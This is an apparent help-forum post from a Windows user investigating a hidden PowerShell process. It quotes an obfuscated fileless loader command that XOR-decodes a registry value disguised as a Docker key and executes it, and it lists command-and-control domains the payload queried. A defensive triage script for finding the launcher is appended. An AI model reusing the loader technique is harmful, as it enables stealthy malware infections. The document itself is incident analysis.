
Where can I find the launcher for this virus that uses Powershell?

Çağlar Arlı      -    16 Views

On my Windows 10 PC, after about 30 minutes of being turned on, I always get a PowerShell window that immediately hides itself and consumes a lot of RAM.

So I went to the powershell directory:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

And with the program "What's locking this file?" on powershell.exe, I got the PID of the process and the command line that was executed:

powershell.exe
  Process ID: 2140
  Command Line: powershell.exe -winDOWSTYLE hIDdEn -COmMAND "ICM ([sCRIPtbLOCk]::cREatE([StRing]::JoIN('', ((get-itempROperTy -paTH 'hklM:\SoFTWare\DOCKEr InC.XzPOAG').'XzPOAGWm' | % { [char]($_ -bXOr 179) }))))"

Since I have the PID, I forced the window to show with AutoHotkey and got the following:

Resolve-DnsName : wmail-endpoint.com : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (wmail-endpoint.com:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-blog.com : Error de servidor DNS
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (bideo-blog.com:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-blog.com : Error de servidor DNS
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (privatproxy-blog.com:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-cdn.com : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (privatproxy-cdn.com:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-chat.com : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (ahoravideo-chat.com:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-blog.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (fairu-blog.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-chat.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (fairu-chat.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-cdn.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (fairu-cdn.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-blog.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (bideo-blog.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-schnellvpn.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (bideo-schnellvpn.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-endpoint.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (privatproxy-endpoint.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-chat.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (privatproxy-chat.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-blog.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (ahoravideo-blog.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-chat.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (ahoravideo-chat.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-cdn.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (ahoravideo-cdn.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

From what I understand, it tries to connect to a server to send my screen (or worse, it is ransomware), but the URLs are no longer useful; I guess law enforcement took them down or something like that.

The command mentions Docker; however, I do not use Docker, so it is surely just a name to mislead. I already made sure to delete that registry key, although I saved a copy; the content was a binary of approximately 19 KB.

After a while it runs these two commands:

powershell.exe
  Process ID: 3192
  Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

powershell.exe
  Process ID: 6628
  Command Line: "powershell.exe"

And what intrigues me here is: what is the intention of these last two commands? Although the PID is available, it was impossible for me to force the window to show.

OK, that is as far as my debugging goes. What I want to know is: based on this information, how do I find the launcher? Because even though I deleted the registry key found in the first command, the launcher is still running.
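Added example, not from the original post: a PowerShell triage script for the case described above. It assumes the hidden powershell.exe still runs under the PID reported earlier (2140 in the post) and that the deleted registry value was exported to a raw file before removal (placeholder path). It walks the parent chain of that process, checks the usual persistence stores for the markers visible in the command line, and decodes the saved value to text for reading, without ever running it.

```powershell
# Added example (not the asker's code). Assumptions: the hidden powershell.exe
# still runs under $HiddenPid, and the REG_BINARY value 'XzPOAGWm' was saved to
# $SavedValue (placeholder path) before the key was deleted.
# The payload is only decoded to a text file for reading, never executed.

$HiddenPid  = 2140
$SavedValue = 'C:\IR\XzPOAGWm.bin'   # placeholder: your saved copy of the registry value
$Markers    = @('XzPOAG', '-bxor', 'scriptblock', 'windowstyle hidden')

function Test-Marker([string]$Text) {
    # -like is case-insensitive, so the randomised casing of the command line does not matter
    foreach ($m in $Markers) { if ($Text -like "*$m*") { return $true } }
    return $false
}

# 1. Parent chain of the hidden process: the launcher is the parent (or an
#    ancestor) of the powershell.exe that carries the -bxor command line.
function Get-ParentChain([int]$ProcId) {
    while ($ProcId -gt 0) {
        $p = Get-CimInstance Win32_Process -Filter "ProcessId = $ProcId"
        if (-not $p) { break }
        [pscustomobject]@{ Pid = $p.ProcessId; Name = $p.Name; CommandLine = $p.CommandLine }
        $ProcId = $p.ParentProcessId
    }
}

# 2. Persistence stores that can start a hidden PowerShell a while after boot.
function Find-PersistenceHits {
    foreach ($k in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                   'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
                   'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run') {
        $props = (Get-ItemProperty $k -ErrorAction SilentlyContinue).PSObject.Properties
        foreach ($p in $props) { if (Test-Marker "$($p.Value)") { "Run key: $k\$($p.Name) = $($p.Value)" } }
    }
    foreach ($t in Get-ScheduledTask) {
        foreach ($a in $t.Actions) {
            if (Test-Marker "$($a.Execute) $($a.Arguments)") { "Task: $($t.TaskPath)$($t.TaskName) -> $($a.Execute) $($a.Arguments)" }
        }
    }
    foreach ($c in Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue) {
        if (Test-Marker "$($c.CommandLineTemplate)") { "WMI consumer: $($c.Name) -> $($c.CommandLineTemplate)" }
    }
    foreach ($s in Get-CimInstance Win32_Service) {
        if (Test-Marker "$($s.PathName)") { "Service: $($s.Name) -> $($s.PathName)" }
    }
}

# 3. Decode the saved value the same way the command does (XOR 179 per byte) into a text file for reading.
function ConvertFrom-XorPayload([string]$Path, [int]$Key = 179) {
    -join ([IO.File]::ReadAllBytes($Path) | ForEach-Object { [char]($_ -bxor $Key) })
}

Get-ParentChain $HiddenPid | Format-Table -AutoSize
Find-PersistenceHits
if (Test-Path $SavedValue) { ConvertFrom-XorPayload $SavedValue | Set-Content "$SavedValue.decoded.txt" }
```

If the parent chain ends at svchost.exe or the task scheduler engine, the scheduled-task and WMI sections are the ones to read closely. Enabling process-creation auditing with command-line logging (Security event ID 4688) records the launcher on the next boot if none of the stores above explains it.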